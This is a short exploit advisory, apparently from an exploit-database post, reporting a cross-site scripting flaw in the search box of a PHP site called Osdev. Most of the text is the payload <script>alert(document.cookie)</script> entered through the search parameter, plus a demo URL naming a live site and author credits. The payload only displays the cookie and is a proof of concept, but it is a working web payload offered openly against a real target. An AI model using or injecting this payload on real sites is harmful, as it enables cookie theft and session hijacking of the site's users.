Osdev suffers from a cross site scripting vulnerability.
65941ace19ec0e9d2655c71cbc659d728db5a42dd20710621a569b1012d8a767
# Exploit Title: Osdev XSS
# Date: 29.02.2012
# Author: Mr.PaPaRoSSe
# Tested: BackTrack 5
# Platform: Php
------------------------------------------------------------------
http://link/?q=searchPost Search Box
<script>alert(document.cookie)</script>
Demo : http://osdev.in/?q=search
------------------------------------------------------------------
Mr.PaPaRoSSe And 3spi0n - GrayHatz
------------------------------------------------------------------